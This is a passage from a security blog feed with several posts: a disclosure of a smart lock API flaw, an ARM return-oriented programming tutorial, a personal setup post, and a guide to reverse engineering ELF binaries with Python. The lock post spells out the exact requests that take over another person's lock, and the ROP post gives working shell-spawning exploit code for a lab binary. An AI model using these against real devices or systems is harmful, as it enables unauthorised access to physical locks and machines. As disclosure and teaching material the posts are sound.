Reversing the app using jd-gui, apktool and dex2jar didn’t get us too far since most of it was obfuscated. Why bother when there’s an easier approach—Burp Suite.

We captured and played around with a bunch of requests and responses, and finally arrived at a working exploit chain.

The exploit

The entire exploit is a 4 step process consisting of authenticated HTTP requests:

  1. Using the lock’s MAC (obtained via a simple Bluetooth scan in the vicinity), get the barcode and lock ID
  2. Using the barcode, fetch the user ID
  3. Using the lock ID and user ID, unbind the user from the lock
  4. Provide a new name, attacker’s user ID and the MAC to bind the attacker to the lock

This is what it looks like, in essence (personal info redacted).

Request 1

POST /oklock/lock/queryDevice
{"mac":"XX:XX:XX:XX:XX:XX"}

Response:

{
   "result":{
      "alarm":0,
      "barcode":"<BARCODE>",
      "chipType":"1",
      "createAt":"2019-05-14 09:32:23.0",
      "deviceId":"",
      "electricity":"95",
      "firmwareVersion":"2.3",
      "gsmVersion":"",
      "id":<LOCK ID>,
      "isLock":0,
      "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
      "lockPwd":"000000",
      "mac":"XX:XX:XX:XX:XX:XX",
      "name":"lock",
      "radioName":"BlueFPL",
      "type":0
   },
   "status":"2000"
}

Request 2

POST /oklock/lock/getDeviceInfo

{"barcode":"https://app.oklok.com.cn/app.html?id=<BARCODE>"}

Response:

   "result":{
      "account":"email@some.website",
      "alarm":0,
      "barcode":"<BARCODE>",
      "chipType":"1",
      "createAt":"2019-05-14 09:32:23.0",
      "deviceId":"",
      "electricity":"95",
      "firmwareVersion":"2.3",
      "gsmVersion":"",
      "id":<LOCK ID>,
      "isLock":0,
      "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
      "lockPwd":"000000",
      "mac":"XX:XX:XX:XX:XX:XX",
      "name":"lock",
      "radioName":"BlueFPL",
      "type":0,
      "userId":<USER ID>
   }

Request 3

POST /oklock/lock/unbind

{"lockId":"<LOCK ID>","userId":<USER ID>}

Request 4

POST /oklock/lock/bind

{"name":"newname","userId":<USER ID>,"mac":"XX:XX:XX:XX:XX:XX"}

That’s it! (& the scary stuff)

You should have the lock transferred to your account. The severity of this issue lies in the fact that the original owner completely loses access to their lock. They can’t even “rebind” to get it back, since the current owner (the attacker) needs to authorize that.

To add to that, roughly 15,000 user accounts’ info is exposed via IDOR. Ilja, a cool dude I met on Telegram, noticed locks named “carlock”, “garage”, “MainDoor”, etc.2 This is terrifying.

shudders

Proof of Concept

PoC Video

Exploit code

Disclosure timeline

  • 26th June, 2019: Issue discovered at SecureLayer7, Pune
  • 27th June, 2019: Vendor notified about the issue
  • 2nd July, 2019: CVE-2019-13143 reserved
  • No response from vendor
  • 2nd August 2019: Public disclosure

Lessons learnt

DO NOT. Ever. Buy. A smart lock. You’re better off with the “dumb” ones with keys. The spreading IoT plague brings a large attack surface to things that were otherwise “unhackable” (try hacking a “dumb” toaster).

The IoT security scene is rife with bugs from over 10 years ago, like executable stack segments3, hardcoded keys, and poor development practices in general.

Our existing threat models and scenarios have to be updated to factor in these new exploitation possibilities. This also broadens the playing field for cyber warfare and mass surveillance campaigns.

Researcher info

This research was done at SecureLayer7, Pune, IN by:


  1. This article discusses a similar smart lock, but they broke the encryption. 

  2. Thanks to Ilja Shaposhnikov (@drakylar). 

  3. PDF 

]]>
https://icyphox.sh/blog/fb50Mon, 05 Aug 2019 00:00:00 +0000https://icyphox.sh/blog/fb50
Return Oriented Programming on ARM (32-bit)Before we start anything, you’re expected to know the basics of ARM assembly to follow along. I highly recommend Azeria’s series on ARM Assembly Basics. Once you’re comfortable with it, proceed with the next bit—environment setup.

Setup

Since we’re working with the ARM architecture, there are two options to go forth with:

  1. Emulate—head over to qemu.org/download and install QEMU. And then download and extract the ARMv6 Debian Stretch image from one of the links here. The scripts found inside should be self-explanatory.
  2. Use actual ARM hardware, like an RPi.

For debugging and disassembling, we’ll be using plain old gdb, but you may use radare2, IDA or anything else, really. All of which can be trivially installed.

And for the sake of simplicity, disable ASLR:

$ echo 0 > /proc/sys/kernel/randomize_va_space

Finally, the binary we’ll be using in this exercise is Billy Ellis’ roplevel2.

Compile it:

$ gcc roplevel2.c -o rop2

With that out of the way, here’s a quick rundown of what ROP actually is.

A primer on ROP

ROP or Return Oriented Programming is a modern exploitation technique that’s used to bypass protections like the NX bit (no-execute bit) and code signing. In essence, no code in the binary is actually modified and the entire exploit is crafted out of pre-existing artifacts within the binary, known as gadgets.

A gadget is essentially a small sequence of code (instructions), ending with a ret, or a return instruction. In our case, since we’re dealing with ARM code, there is no ret instruction but rather a pop {pc} or a bx lr. These gadgets are chained together by jumping (returning) from one to the other to form what’s called a ropchain. At the end of a ropchain, there’s generally a call to system(), to achieve code execution.

In practice, the process of executing a ropchain is something like this:

  • confirm the existence of a stack-based buffer overflow
  • identify the offset at which the instruction pointer gets overwritten
  • locate the addresses of the gadgets you wish to use
  • craft your input keeping in mind the stack’s layout, and chain the addresses of your gadgets

LiveOverflow has a beautiful video where he explains ROP using “weird machines”. Check it out, it might be just what you needed for that “aha!” moment :)

Still don’t get it? Don’t fret, we’ll look at actual exploit code in a bit and hopefully that should put things into perspective.

Exploring our binary

Start by running it, and entering any arbitrary string. On entering a fairly large string, say, “A” × 20, we see a segmentation fault occur.

string and segfault

Now, open it up in gdb and look at the functions inside it.

gdb functions

There are three functions that are of importance here: main, winner and gadget. Disassembling the main function:

gdb main disassembly

We see a buffer of 16 bytes being created (sub sp, sp, #16), and some calls to puts()/printf() and scanf(). Looks like winner and gadget are never actually called.

Disassembling the gadget function:

gdb gadget disassembly

This is fairly simple: the stack is being set up by pushing {r11}, which is also the frame pointer (fp). What’s interesting is the pop {r0, pc} instruction in the middle. This is a gadget.

We can use this to control what goes into r0 and pc. Unlike in x86, where arguments to functions are passed on the stack, ARM uses the registers r0 to r3 for this. So this gadget effectively lets us pass an argument to a function via r0, and then jump to that function by placing its address in pc. Neat.

Moving on to the disassembly of the winner function:

gdb winner disassembly

Here, we see calls to puts(), system() and finally, exit(). So our end goal, quite obviously, is to execute code via the system() function.

Now that we have an overview of what’s in the binary, let’s formulate a method of exploitation by messing around with inputs.

Messing around with inputs :^)

Back to gdb, hit r to run and pass in a patterned input, like in the screenshot.

gdb info reg post segfault

We hit a segfault because of invalid memory at address 0x46464646. Notice that the pc has been overwritten with our input. So we smashed the stack alright, but more importantly, the overwrite lands on the letter ‘F’ (0x46) in our pattern.

Since we know the offset at which the pc gets overwritten, we can now control program execution flow. Let’s try jumping to the winner function.

Disassemble winner again using disas winner and note down the address of its second instruction—add r11, sp, #4. For this, we’ll use Python to print our input string, replacing FFFF with the address of winner. Note the endianness.

$ python -c 'print("AAAABBBBCCCCDDDDEEEE\x28\x05\x01\x00")' | ./rop2

jump to winner

The reason we don’t jump to the first instruction is because we want to control the stack ourselves. If we allow push {r11, lr} (the first instruction) to occur, the program will pop those out after winner is done executing and we will no longer control where it jumps to.

So that didn’t do much; it just prints out the string “Nothing much here…”. It does, however, contain a call to system(), which needs to be fed an argument to do what we want (run a command, execute a shell, etc.).

To do that, we’ll follow a multi-step process:

  1. Jump to the address of gadget, again the 2nd instruction. This will pop r0 and pc.
  2. Push our command to be executed, say “/bin/sh” onto the stack. This will go into r0.
  3. Then, push the address of system(). And this will go into pc.

The pseudo-code is something like this:

string = AAAABBBBCCCCDDDDEEEE
gadget = # addr of gadget
binsh  = # addr of /bin/sh
system = # addr of system()

print(string + gadget + binsh + system)

Clean and mean.

The exploit

To write the exploit, we’ll use Python and the absolute godsend of a library—struct. It allows us to pack the bytes of addresses to the endianness of our choice. It probably does a lot more, but who cares.

Let’s start by fetching the address of /bin/sh. In gdb, set a breakpoint at main, hit r to run, and search the entire address space for the string “/bin/sh”:

(gdb) find &system, +9999999, "/bin/sh"

gdb finding /bin/sh

One hit at 0xb6f85588. The addresses of gadget and system() can be found from the disassemblies from earlier. Here’s the final exploit code:

import struct

binsh = struct.pack("I", 0xb6f85588)
string = "AAAABBBBCCCCDDDDEEEE"
gadget = struct.pack("I", 0x00010550)
system = struct.pack("I", 0x00010538)

print(string + gadget + binsh + system)

Honestly, not too far off from our pseudo-code :)
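One small caveat: the print(string + gadget + ...) concatenation only works under Python 2, where struct.pack returns a str. If you only have Python 3 around, a rough equivalent (same addresses, written out as raw bytes) would be:

# exploit_py3.py -- Python 3 take on the same payload; the addresses are from
# this particular run and will differ on your setup
import struct
import sys

padding = b"AAAABBBBCCCCDDDDEEEE"         # 20 bytes up to the saved pc
gadget  = struct.pack("<I", 0x00010550)   # pop {r0, pc}
binsh   = struct.pack("<I", 0xb6f85588)   # "/bin/sh", found via gdb
system  = struct.pack("<I", 0x00010538)   # system(), from the winner disassembly

# write raw bytes so nothing gets mangled by text encoding
sys.stdout.buffer.write(padding + gadget + binsh + system)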

Let’s see it in action:

the shell!

Notice that it doesn’t work the first time, and this is because /bin/sh terminates when the pipe closes, since there’s no input coming in from STDIN. To get around this, we use cat(1) which allows us to relay input through it to the shell. Nifty trick.

Conclusion

This was a fairly basic challenge, with everything laid out conveniently. Actual ropchaining is a little more involved, with a lot more gadgets to be chained to achieve code execution.

Hopefully, I’ll get around to writing about heap exploitation on ARM too. That’s all for now.

]]>
https://icyphox.sh/blog/rop-on-armThu, 06 Jun 2019 00:00:00 +0000https://icyphox.sh/blog/rop-on-arm
My setupHardware

The only computer I have with me is my HP Envy 13 (2018) (my model looks a little different). It’s a 13” ultrabook, with an i5 8250u, 8 gigs of RAM and a 256 GB NVMe SSD. It’s a very comfy machine that does everything I need it to.

For my phone, I use a OnePlus 6T, running stock OxygenOS. As of this writing, its bootloader hasn’t been unlocked and nor has the device been rooted. I’m also a proud owner of a Nexus 5, which I really wish Google rebooted. It’s surprisingly still usable and runs Android Pie, although the SIM slot is ruined and the battery backup is abysmal.

My watch is a Samsung Gear S3 Frontier. Tizen is definitely better than Android Wear.

My keyboard, although not with me in college, is a very old Dell SK-8110. For the little bit of gaming that I do, I use a HP m150 gaming mouse. It’s the perfect size (and color).

For my music, I use the Bose SoundLink II. Great pair of headphones, although the ear cups need replacing.

And the software

My distro of choice for the past ~1 year has been elementary OS. I used to be an Arch Linux elitist, complete with an esoteric window manager, all riced. I now use whatever JustWorks™.

Update: As of June 2019, I’ve switched over to a vanilla Debian 9 Stretch install, running i3 as my window manager. If you want, you can dig through my configs at my dotfiles repo.

Here’s a (riced) screenshot of my desktop.

scrot

Most of my work is done in either the browser, or the terminal. My shell is pure zsh, as in no plugin frameworks. It’s customized using built-in zsh functions. Yes, you don’t actually need a framework. It’s useless bloat. The prompt itself is generated using a framework I built in Nim, nicy. My primary text editor is nvim. Again, all configs in my dotfiles repo linked above. I manage all my passwords using pass(1), and I use rofi-pass to access them via rofi.

Most of my security tooling is typically run via a Kali Linux docker container. This is convenient for many reasons: it keeps your global namespace clean, and it’s a single command to drop into a Kali shell.

I use a DigitalOcean droplet (BLR1) as a public filehost, found at x.icyphox.sh. The UI is the wonderful serve, by ZEIT. The same box also serves as my IRC bouncer and OpenVPN (TCP), which I tunnel via SSH running on 443. Campus firewall woes.

I plan on converting my desktop back at home into a homeserver setup. Soon™.

]]>
https://icyphox.sh/blog/my-setupMon, 13 May 2019 00:00:00 +0000https://icyphox.sh/blog/my-setup
Python for Reverse Engineering #1: ELF BinariesWhile solving complex reversing challenges, we often use established tools like radare2 or IDA for disassembling and debugging. But there are times when you need to dig in a little deeper and understand how things work under the hood.

Rolling your own disassembly scripts can be immensely helpful when it comes to automating certain processes, and eventually building your own homebrew reversing toolchain of sorts. At least, that’s what I’m attempting anyway.

Setup

As the title suggests, you’re going to need a Python 3 interpreter before anything else. Once you’ve confirmed beyond reasonable doubt that you do, in fact, have a Python 3 interpreter installed on your system, run

$ pip install capstone pyelftools

where capstone is the disassembly engine we’ll be scripting with, and pyelftools helps parse ELF files.

With that out of the way, let’s start with an example of a basic reversing challenge.

/* chall.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {
   char *pw = malloc(10);   // room for "abcdefghi" + '\0'
   pw[0] = 'a';
   for(int i = 1; i <= 8; i++){
       pw[i] = pw[i - 1] + 1;
   }
   pw[9] = '\0';
   char *in = malloc(10);
   printf("password: ");
   fgets(in, 10, stdin);        // 'abcdefghi'
   if(strcmp(in, pw) == 0) {
       printf("haha yes!\n");
   }
   else {
       printf("nah dude\n");
   }
}

Compile it with GCC/Clang:

$ gcc chall.c -o chall.elf

Scripting

For starters, let’s look at the different sections present in the binary.

# sections.py

from elftools.elf.elffile import ELFFile

with open('./chall.elf', 'rb') as f:
    e = ELFFile(f)
    for section in e.iter_sections():
        print(hex(section['sh_addr']), section.name)

This script iterates through all the sections and also shows us where each one is loaded. This will be pretty useful later. Running it gives us

› python sections.py
0x238 .interp
0x254 .note.ABI-tag
0x274 .note.gnu.build-id
0x298 .gnu.hash
0x2c0 .dynsym
0x3e0 .dynstr
0x484 .gnu.version
0x4a0 .gnu.version_r
0x4c0 .rela.dyn
0x598 .rela.plt
0x610 .init
0x630 .plt
0x690 .plt.got
0x6a0 .text
0x8f4 .fini
0x900 .rodata
0x924 .eh_frame_hdr
0x960 .eh_frame
0x200d98 .init_array
0x200da0 .fini_array
0x200da8 .dynamic
0x200f98 .got
0x201000 .data
0x201010 .bss
0x0 .comment
0x0 .symtab
0x0 .strtab
0x0 .shstrtab

Most of these aren’t relevant to us, but a few sections here are to be noted. The .text section contains the instructions (opcodes) that we’re after. The .data section should have strings and constants initialized at compile time. Finally, there’s the .plt, the Procedure Linkage Table, and the .got, the Global Offset Table. If you’re unsure about what these mean, read up on the ELF format and its internals.

Since we know that the .text section has the opcodes, let’s disassemble the binary starting at that address.

# disas1.py

from elftools.elf.elffile import ELFFile
from capstone import *

with open('./chall.elf', 'rb') as f:
    elf = ELFFile(f)
    code = elf.get_section_by_name('.text')
    ops = code.data()
    addr = code['sh_addr']
    md = Cs(CS_ARCH_X86, CS_MODE_64)
    for i in md.disasm(ops, addr):        
        print(f'0x{i.address:x}:\t{i.mnemonic}\t{i.op_str}')

The code is fairly straightforward (I think). We should be seeing this, on running

› python disas1.py | less      
0x6a0: xor ebp, ebp
0x6a2: mov r9, rdx
0x6a5: pop rsi
0x6a6: mov rdx, rsp
0x6a9: and rsp, 0xfffffffffffffff0
0x6ad: push rax
0x6ae: push rsp
0x6af: lea r8, [rip + 0x23a]
0x6b6: lea rcx, [rip + 0x1c3]
0x6bd: lea rdi, [rip + 0xe6]
**0x6c4: call qword ptr [rip + 0x200916]**
0x6ca: hlt
... snip ...

The line in bold is fairly interesting to us. The address at [rip + 0x200916] is equivalent to [0x6ca + 0x200916], which in turn evaluates to 0x200fe0. So the very first call is to a function at 0x200fe0. What could this function be?
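Note that the offset is added to 0x6ca, the address of the next instruction, because that is what rip points to while the call executes. A quick check in a Python REPL:

>>> hex(0x6ca + 0x200916)  # rip-relative: offset + address of the *next* instruction
'0x200fe0'

Either way, we still don’t know what actually lives at 0x200fe0.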

For this, we will have to look at relocations. Quoting linuxbase.org

Relocation is the process of connecting symbolic references with symbolic definitions. For example, when a program calls a function, the associated call instruction must transfer control to the proper destination address at execution. Relocatable files must have “relocation entries” which are necessary because they contain information that describes how to modify their section contents, thus allowing executable and shared object files to hold the right information for a process’s program image.

To try and find these relocation entries, we write a third script.

# relocations.py

import sys
from elftools.elf.elffile import ELFFile
from elftools.elf.relocation import RelocationSection

with open('./chall.elf', 'rb') as f:
    e = ELFFile(f)
    for section in e.iter_sections():
        if isinstance(section, RelocationSection):
            print(f'{section.name}:')
            symbol_table = e.get_section(section['sh_link'])
            for relocation in section.iter_relocations():
                symbol = symbol_table.get_symbol(relocation['r_info_sym'])
                addr = hex(relocation['r_offset'])
                print(f'{symbol.name} {addr}')

Let’s run through this code real quick. We first loop through the sections, and check whether each is of type RelocationSection. We then iterate through each section’s relocations, looking up the corresponding symbol in its symbol table. Finally, running this gives us

› python relocations.py
.rela.dyn:
 0x200d98
 0x200da0
 0x201008
_ITM_deregisterTMCloneTable 0x200fd8
**__libc_start_main 0x200fe0**
__gmon_start__ 0x200fe8
_ITM_registerTMCloneTable 0x200ff0
__cxa_finalize 0x200ff8
stdin 0x201010
.rela.plt:
puts 0x200fb0
printf 0x200fb8
fgets 0x200fc0
strcmp 0x200fc8
malloc 0x200fd0

Remember the function call at 0x200fe0 from earlier? Yep, so that was a call to the well known __libc_start_main. Again, according to linuxbase.org

The __libc_start_main() function shall perform any necessary initialization of the execution environment, call the main function with appropriate arguments, and handle the return from main(). If the main() function returns, the return value shall be passed to the exit() function.

And its definition is like so

int __libc_start_main(int *(main) (int, char * *, char * *), 
int argc, char * * ubp_av, 
void (*init) (void), 
void (*fini) (void), 
void (*rtld_fini) (void), 
void (* stack_end));

Looking back at our disassembly

0x6a0: xor ebp, ebp
0x6a2: mov r9, rdx
0x6a5: pop rsi
0x6a6: mov rdx, rsp
0x6a9: and rsp, 0xfffffffffffffff0
0x6ad: push rax
0x6ae: push rsp
0x6af: lea r8, [rip + 0x23a]
0x6b6: lea rcx, [rip + 0x1c3]
**0x6bd: lea rdi, [rip + 0xe6]**
0x6c4: call qword ptr [rip + 0x200916]
0x6ca: hlt
... snip ...

This time, look at the lea, or Load Effective Address, instruction, which loads the address [rip + 0xe6] into the rdi register. [rip + 0xe6] evaluates to 0x7aa, which happens to be the address of our main() function! How do I know that? Because __libc_start_main(), after doing whatever it does, eventually jumps to the function in rdi, which is generally main().

To see the disassembly of main, seek to 0x7aa in the output of the script we’d written earlier (disas1.py).
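If scrolling through less gets tedious, a tiny variant of disas1.py (my own tweak, not part of the original scripts) can start the listing at main directly, now that we know its address:

# disas_main.py -- start disassembling at main (0x7aa for this particular build)
from elftools.elf.elffile import ELFFile
from capstone import Cs, CS_ARCH_X86, CS_MODE_64

MAIN_ADDR = 0x7aa

with open('./chall.elf', 'rb') as f:
    elf = ELFFile(f)
    code = elf.get_section_by_name('.text')
    ops = code.data()
    base = code['sh_addr']
    md = Cs(CS_ARCH_X86, CS_MODE_64)
    # slice into the section's bytes to skip everything before main
    for i in md.disasm(ops[MAIN_ADDR - base:], MAIN_ADDR):
        print(f'0x{i.address:x}:\t{i.mnemonic}\t{i.op_str}')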

From what we discovered earlier, each call instruction points to some function, which we can identify from the relocation entries. Following each call to its relocation gives us this

printf 0x650
fgets  0x660
strcmp 0x670
malloc 0x680

Putting all this together, things start falling into place. Let me highlight the key sections of the disassembly here. It’s pretty self-explanatory.

0x7b2: mov edi, 0xa  ; 10
0x7b7: call 0x680    ; malloc

The loop to populate the *pw string

0x7d0:  mov     eax, dword ptr [rbp - 0x14]
0x7d3:  cdqe    
0x7d5:  lea     rdx, [rax - 1]
0x7d9:  mov     rax, qword ptr [rbp - 0x10]
0x7dd:  add     rax, rdx
0x7e0:  movzx   eax, byte ptr [rax]
0x7e3:  lea     ecx, [rax + 1]
0x7e6:  mov     eax, dword ptr [rbp - 0x14]
0x7e9:  movsxd  rdx, eax
0x7ec:  mov     rax, qword ptr [rbp - 0x10]
0x7f0:  add     rax, rdx
0x7f3:  mov     edx, ecx
0x7f5:  mov     byte ptr [rax], dl
0x7f7:  add     dword ptr [rbp - 0x14], 1
0x7fb:  cmp     dword ptr [rbp - 0x14], 8
0x7ff:  jle     0x7d0

And this looks like our strcmp()

0x843:  mov     rdx, qword ptr [rbp - 0x10] ; *in
0x847:  mov     rax, qword ptr [rbp - 8]    ; *pw
0x84b:  mov     rsi, rdx             
0x84e:  mov     rdi, rax
0x851:  call    0x670                       ; strcmp  
0x856:  test    eax, eax                    ; is = 0? 
0x858:  jne     0x868                       ; no? jump to 0x868
0x85a:  lea     rdi, [rip + 0xae]           ; "haha yes!" 
0x861:  call    0x640                       ; puts
0x866:  jmp     0x874
0x868:  lea     rdi, [rip + 0xaa]           ; "nah dude"
0x86f:  call    0x640                       ; puts  

I’m not sure why it uses puts here? I might be missing something; perhaps printf calls puts. I could be wrong. I also confirmed with radare2 that those locations are actually the strings “haha yes!” and “nah dude”.

Update: It’s because of compiler optimization. A printf() with a constant string and no format specifiers (as is the case here) is a bit overkill, so it gets simplified to a puts().

Conclusion

Wew, that took quite some time. But we’re done. If you’re a beginner, you might find this extremely confusing, or you might not have understood what was going on at all. And that’s okay. Building an intuition for reading and grokking disassembly comes with practice. I’m no good at it either.

All the code used in this post is here: https://github.com/icyphox/asdf/tree/master/reversing-elf

Ciao for now, and I’ll see ya in #2 of this series—PE binaries. Whenever that is.

]]>
https://icyphox.sh/blog/python-for-re-1Fri, 08 Feb 2019 00:00:00 +0000https://icyphox.sh/blog/python-for-re-1